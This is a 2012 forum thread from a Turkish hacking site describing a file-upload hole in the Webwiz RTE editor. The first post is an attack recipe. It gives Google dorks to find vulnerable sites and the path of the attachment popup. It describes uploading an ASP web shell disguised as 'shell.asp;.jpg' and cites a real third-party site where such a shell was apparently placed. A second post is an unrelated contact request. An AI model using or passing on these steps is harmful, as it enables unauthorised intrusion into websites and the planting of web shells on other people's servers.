Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.






Webwiz RTE Açığı

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 15-06-2012 11:21   #1
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
02/2012
Nereden
THT
Mesajlar
Konular

Teşekkür (Etti): 94
Teşekkür (Aldı): 181


Arrow Webwiz RTE Açığı



Google Dorks:
inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/

Exploit: site.com/rte/RTE_popup_file_atch.asp

Örnek:
Siteleri arattık rte uzantısı şu şekil çıktı; Hacked_bY_iLLuminate_d3moN şimdi sitenin sonuna upload linkini yapıştırıcaz;

Attach File Properties

açılan sitede jpg shell imizi upload ediyoruz shell.asp;.jpg sonra upload linkimizin olduğu yere gidiyoruz. o dizinde /my_********s/my_files/ burası oluyor.

http://www.jrf.org.tw/newjrf/rte/my_...677_x.asp;.jpg



___________________________________________

Benim Sadık Yarim Kara Topraktır
 Offline  
 
Alıntı ile Cevapla
Alt 09-09-2012 11:40   #2
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
06/2012
Mesajlar
Konular
1

Teşekkür (Etti): 0
Teşekkür (Aldı): 0


Post devidazim



kardes bı ıletısıma dresınıı werırımsn



___________________________________________

:inv

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli
instagram takipci hilesi

wau